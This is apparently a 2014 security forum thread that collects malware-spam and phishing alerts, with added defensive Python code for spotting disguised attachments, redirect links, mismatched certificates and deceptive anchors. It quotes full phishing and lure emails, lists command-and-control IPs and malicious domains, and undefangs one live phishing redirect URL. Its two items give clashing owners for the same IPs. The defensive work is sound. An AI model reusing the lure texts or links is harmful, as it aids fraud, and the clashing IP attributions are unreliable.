Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165 ..."
(More at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/b9a54ef4f769068af029aa7941c464990c476911180c9f4ec3379ab3b51ff5b3/analysis/1409733696/

** https://www.virustotal.com/en-gb/file/960ed795dca89e50745251adf6712719a1af1aa5fd1a66c9424c777574180548/analysis/1409734574/
___

“YouTube Account Manager has sent you a Message…”
- https://blog.malwarebytes.org/fraud-scam/2014/09/youtube-account-manager-has-sent-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.
* If you decide to ignore this message and not follow the above steps your account will be suspended.

This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwarebytes.org/wp-content/uploads/2014/09/ytaccountmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___

Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecurity.co.uk/transaction-via-internet-free-charge-idi613410_745-fake-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activity
A number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co .uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...

3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cdbf146c2e551614c0f66b700b36236afdb6edb66c91e29b8da79037e3513d5e/analysis/1409750135/
___

Fake attached CBE form SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-review-attached-cbe-form-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
Importat message, read right away.
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team

3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/415616d596d105b6b7063dda97c25411747c4b7fe9543d8a9214483be7bd2675/analysis/1409761379/
___

Fake 'August report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/august-report-fake-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager

This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409724912/
___

Fake Sky .com SPAM ...
- http://blog.dynamoo.com/2014/09/skycom-statement-of-account-spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
Date: Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for August, invoice as this is now due for payment.
Regards,
Clark ...

The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustotal.com/en-gb/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409736793/
___

Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-important-documents-fake-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> the name of sender at RBS appears to be random and can be any name is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
[RBS Logo Image]
Building tomorrow
RE: Important Information
We’re letting you know we have received a request from your bank to complete and sign the attached documents.
To view/download the documents please click here.
Please fill out the documents and fax them at +44 131 242 0017
Simon Leiman
Senior Accounting Manager
Tel. +44 131 242 0017
Email: Simon.Leiman@ rbs .com
© Royal Bank of Scotland 2014 ...

3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35492a48e63c523aec07cae081645dbad07680916f6cfac51f34dcdde41c0822/analysis/
___

iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmicro.com/trendlabs-security-intelligence/icloud-hacking-leak-now-being-used-as-social-engineering-lure/
Sep 3, 2014 - "... it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet sports a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencetweet.png
Website with offered video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencevideoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencefacebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files are part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___

'Infrastructure-configuration' adjustment
- http://www.reuters.com/article/2014/09/03/us-facebook-outages-idUSKBN0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."

:mad: :fear:
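Several of the reports in this post describe the same trick: a .zip attachment whose member is really an executable (.exe or .scr) carrying a PDF icon and a name like 00056468.pdf.exe, so that a user without "show known file extensions" enabled sees a document. The following is an added example (not code from myonlinesecurity or dynamoo) of a mail-gateway style check that inspects attachment names without extracting anything to disk, and backs the name check with the first bytes of the content, since a Windows PE file starts with "MZ" whatever it is called. The sample archive is constructed in memory with dummy bytes. Note the caveat the cbe_form.pdf report above illustrates: a verdict of "ok" only means "not disguised"; a genuine PDF can still carry an exploit.

```python
"""Classify e-mail attachments whose names hide an executable (added example)."""
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows will execute on double-click (not exhaustive; assumption).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".jar", ".lnk", ".msi"}
# Extensions a user expects to be harmless documents or media.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt",
                 ".jpg", ".png", ".htm", ".html"}


def classify_name(name):
    """Return (verdict, reason) from the file name alone."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes:
        return "suspicious", "no extension"
    last = suffixes[-1]
    if last in EXECUTABLE_EXTS:
        if len(suffixes) >= 2 and suffixes[-2] in DOCUMENT_EXTS:
            return "malicious", f"document extension {suffixes[-2]} hides executable {last}"
        return "malicious", f"executable attachment {last}"
    return "ok", f"extension {last}"


def classify(name, head):
    """Combine the name check with the leading bytes: a PE image starts with
    b'MZ' regardless of the icon or name it was given."""
    verdict, reason = classify_name(name)
    if head.startswith(b"MZ") and verdict != "malicious":
        return "malicious", f"PE header behind non-executable name {name}"
    return verdict, reason


def scan_attachment(name, data):
    """Classify an attachment; zip archives are inspected member by member
    in memory. Returns a list of (path, verdict, reason)."""
    if PurePosixPath(name).suffix.lower() == ".zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                results = []
                for member in zf.namelist():
                    with zf.open(member) as fh:
                        head = fh.read(2)        # only the magic, never the whole payload
                    verdict, reason = classify(member, head)
                    results.append((f"{name}!{member}", verdict, reason))
                return results
        except zipfile.BadZipFile:
            return [(name, "suspicious", "named .zip but not a valid archive")]
    verdict, reason = classify(name, data[:2])
    return [(name, verdict, reason)]


def build_sample_zip():
    """Constructed archive mimicking the attachments described above; member
    contents are dummy bytes, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("00056468.pdf.exe", b"MZ dummy")   # double extension
        zf.writestr("Case_090314.scr", b"MZ dummy")    # screensaver = executable
        zf.writestr("readme.txt", b"plain text")       # genuinely harmless
        zf.writestr("invoice.pdf", b"MZ dummy")        # PE content, document name
    return buf.getvalue()


if __name__ == "__main__":
    for path, verdict, reason in scan_attachment("00056468.pdf.zip", build_sample_zip()):
        print(f"{verdict:10} {path}: {reason}")
```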

AplusWebMaster
2014-09-04, 15:10
FYI...

Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo.com/2014/09/sagecouk-invoice7104304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
From: Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
Date: 23 July 2014 10:31
Subject: FW: Invoice_7104304
Please see attached copy of the original invoice (Invoice_7104304).

Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo.com/2014/09/companies-house-ar01-annual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.

Screenshot: https://4.bp.blogspot.com/-ye6yNCTxN5k/VAhC_lNqhQI/AAAAAAAAFjc/azWsv0o1st0/s1600/companies-house-5.png

Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago..."
** https://www.virustotal.com/en-gb/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/

- http://myonlinesecurity.co.uk/fw-invoice_5294370-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustotal.com/en/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/1409823534/
___

Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecurity.co.uk/unauthorised-itunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
My Apple ID
It looks like someone used your data to make unverified purchase.
We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
Thank you.

Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."

111.90.144.179: https://www.virustotal.com/en-gb/ip-address/111.90.144.179/information/

:mad: :fear::fear:
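The iTunes phish above hides its landing page behind a google.com/url link whose q= parameter is percent-encoded so that even the "http://" is not readable at a glance. The following added example (not code from the post's author) unwraps such links offline: it pulls the embedded target out of the query string, peels repeated percent-encoding, and reports the host the user sees against the host the link actually leads to. The first sample is the exact URL quoted above with the defanging spaces removed; the double-encoded variant and the list of parameter names are constructed assumptions. The dl6.c1l.us hop is an HTTP shortener, so the final 111.90.144.179 address from the post would only be seen by fetching it, which this code deliberately does not do.

```python
"""Unwrap redirect URLs to reveal the real landing host (added example)."""
from urllib.parse import urlsplit, parse_qs, unquote

# The redirect quoted in the post above, defanging spaces removed.
PAGE_SAMPLE = ("https://www.google.com/url?gc=PAH96di-ZUnHVlY"
               "&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D"
               "&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA")

# Constructed: the same target percent-encoded twice.
DOUBLE_ENCODED = ("https://www.google.com/url?q=%2568%2574tp%253a%252f%252fdl6.c1l"
                  "%252eus%252fSb7ouez")

# Query keys that commonly carry a redirect target (assumption; extend for the
# services seen in your own mail and proxy logs).
REDIRECT_PARAMS = ("q", "url", "u", "redirect", "redirect_uri", "target", "dest", "next")


def next_hop(url):
    """Return the absolute URL embedded in `url`'s query string, or None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # decodes once
    for key in REDIRECT_PARAMS:
        for value in query.get(key, []):
            for _ in range(3):                 # peel extra layers of %-encoding
                before, value = value, unquote(value)
                if value == before:
                    break
            parts = urlsplit(value)
            if parts.scheme in ("http", "https") and parts.hostname:
                return value
    return None


def unwrap(url, max_hops=5):
    """Follow embedded redirect parameters without any network access.
    Returns the list of hops, starting with the original URL."""
    hops = [url]
    while len(hops) <= max_hops:
        nxt = next_hop(hops[-1])
        if nxt is None:
            break
        hops.append(nxt)
    return hops


def redirect_report(url):
    """Compare the host a reader sees with the host the link really ends on."""
    hops = unwrap(url)
    shown = urlsplit(hops[0]).hostname
    final = urlsplit(hops[-1]).hostname
    return {"shown_host": shown, "final_host": final,
            "hops": hops, "disguised": shown != final}


if __name__ == "__main__":
    for sample in (PAGE_SAMPLE, DOUBLE_ENCODED):
        print(redirect_report(sample))
```

A search link such as google.com/search?q=apple+id has a q= value that is not a URL, so it is not treated as a redirect; only an embedded absolute http(s) URL counts.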

AplusWebMaster
2014-09-05, 14:42
FYI...

Phishing safety ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-safety-is-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/legvsphishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.” Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/boagreenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to enter credentials and personally identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Affected-Countries-01.jpg ..."
___

Hoax email comes with malicious Word doc
- http://blog.dynamoo.com/2014/09/shakira-death-hoax-email-comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro... translates as:
Shakira dies in serious accident
This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost her life. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.

When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspot.com/-Fl3B4-2DtGs/VAnGpyytNwI/AAAAAAAAFjw/tAwTQGZ3IR8/s1600/shakira.png

The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustotal.com/en-gb/file/564d1beb56c8738d7d1c00f1e863abe0b0cbc1878c26d9c688df0b61da25875b/analysis/1409926479/
___

NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malwarebytes.org/fraud-scam/2014/09/natwest-phish-you-are-logging-in-from-different-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:

Dear Customer,
During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
NatWest customers are not permitted to log in from different places at same time, or using proxies.
For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.

The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___

Cryptographic Locker
- http://www.webroot.com/blog/2014/09/05/cryptographic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot.com/blog/wp-content/uploads/2014/09/background-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit... this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/

:fear: :mad:
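The Trend Micro item above makes the point that a padlock only proves the certificate matches the host in the address bar, and a phishing page placed on a compromised or free HTTPS host inherits that host's perfectly valid certificate; the user still has to compare the certificate's name with the site they meant to visit. The following added example (not Trend Micro's code) separates those two checks. It implements the hostname-matching rule browsers apply (exact match, or a wildcard standing for the whole leftmost label only) over the dict layout Python's ssl.SSLSocket.getpeercert() returns, with two constructed certificates: one for the bank, one wildcard certificate of a hypothetical hosting provider whose customer site has been compromised.

```python
"""Check whether a TLS certificate is for the site you intended (added example)."""

# Constructed certificates in the dict layout ssl.SSLSocket.getpeercert() returns.
BANK_CERT = {
    "subject": ((("commonName", "www.bankofamerica.com"),),),
    "subjectAltName": (("DNS", "www.bankofamerica.com"), ("DNS", "bankofamerica.com")),
}
# Valid wildcard certificate of an unrelated (hypothetical) hosting provider;
# a customer site under it has been compromised to host the phishing page.
HOSTING_CERT = {
    "subject": ((("commonName", "*.hosting.example"),),),
    "subjectAltName": (("DNS", "*.hosting.example"), ("DNS", "hosting.example")),
}


def cert_names(cert):
    """DNS names the certificate is valid for; the CN counts only when no SAN
    entries exist, as browsers treat it."""
    names = [v.lower() for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        names = [v.lower() for rdn in cert.get("subject", ())
                 for k, v in rdn if k == "commonName"]
    return names


def name_matches(pattern, hostname):
    """RFC 6125-style comparison: exact match, or '*' replacing the whole leftmost
    label only, so '*.hosting.example' never covers 'a.b.hosting.example' and a
    bare '*.com' is rejected."""
    pattern, hostname = pattern.lower(), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def assess(url_host, cert, intended_host):
    """'padlock' is what the browser verifies: the cert matches the URL's host.
    'intended' is the check the user must make: the cert matches the site they
    meant to visit."""
    names = cert_names(cert)
    return {"names": names,
            "padlock": any(name_matches(n, url_host) for n in names),
            "intended": any(name_matches(n, intended_host) for n in names)}


if __name__ == "__main__":
    print(assess("www.bankofamerica.com", BANK_CERT, "www.bankofamerica.com"))
    print(assess("victimshop.hosting.example", HOSTING_CERT, "www.bankofamerica.com"))
```

The second call is the HTTPS-phishing case from the post: the browser is right to show the padlock, and the page is still a phish because "intended" is false.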
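The NatWest phish above uses the "old trick" of showing the genuine bank URL as the link text while the href points at a compromised site, which is why the post advises hovering over links. The following added example (not Malwarebytes' code) automates that hover for a whole HTML message: it collects every anchor with Python's standard html.parser and flags those whose visible text is itself a URL on a different host than the href. The e-mail body is constructed from the quoted text, and paint-shop.example stands in for the compromised site the post describes.

```python
"""Flag links whose visible URL disagrees with their real href (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML body modelled on the phish quoted above.
SAMPLE_HTML = """<p>Dear Customer,</p>
<p>For your safety, we have temporarily deactivated your account, to reactive your
account please go to our SSL secure link below and update your account credentials.</p>
<p><a href="http://paint-shop.example/images/nw/update.php">https://www.natwest.com/personal.html</a></p>
<p><a href="https://www.natwest.com/personal.html">https://www.natwest.com/personal.html</a></p>
<p><a href="https://www.natwest.com/help">Contact us</a></p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the document."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._in_a = False
        self._href = ""
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._in_a, self._href, self._text = True, dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._in_a:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._in_a:
            self.links.append((self._href, "".join(self._text).strip()))
            self._in_a = False


def find_deceptive_links(html):
    """Return anchors whose link text is an http(s) URL on a host other than
    the href's host. Plain-word link text ("Contact us") is not judged here."""
    parser = LinkCollector()
    parser.feed(html)
    deceptive = []
    for href, text in parser.links:
        shown = urlsplit(text)
        if shown.scheme in ("http", "https") and shown.hostname:
            actual_host = (urlsplit(href).hostname or "").lower()
            if actual_host != shown.hostname.lower():
                deceptive.append({"shown": text, "actual": href,
                                  "shown_host": shown.hostname, "actual_host": actual_host})
    return deceptive


if __name__ == "__main__":
    for hit in find_deceptive_links(SAMPLE_HTML):
        print(f"text shows {hit['shown_host']} but link goes to {hit['actual_host']}")
```

Comparing full hostnames is deliberate: a text of www.natwest.com over an href to a look-alike such as natwest.com.example is exactly what should be flagged, so no attempt is made to treat "similar" domains as equal.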

AplusWebMaster
2014-09-08, 13:20
FYI...

Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo.com/2014/09/bh-live-tickets-peter-pan-spam.html
8 Sep 2014 - "... very large quantity of these spam emails, purporting to be from:
From: bhlivetickets@ bhlive .co.uk
Date: 8 September 2014 08:43
Subject: Confirmation of Order Number 484914
ORDER CONFIRMATION
Order Number Order Date
484914 07-09-2014 13:00
YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...

These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129"
* https://www.virustotal.com/en-gb/file/7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3/analysis/1410162673/

** http://camas.comodo.com/cgi-bin/submit?file=7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3

*** https://www.virustotal.com/en-gb/file/41de66fb7dc00dd5fe19e2fa6247af3b30b2ed3a80eadc1cc4410ea8b227ef47/analysis/1410163490/

**** http://www.threatexpert.com/report.aspx?md5=992acfe50852f1287394a991645aec4b

- http://myonlinesecurity.co.uk/confirmation-order-number-fake-pdf-malware/
8 Sep 2014
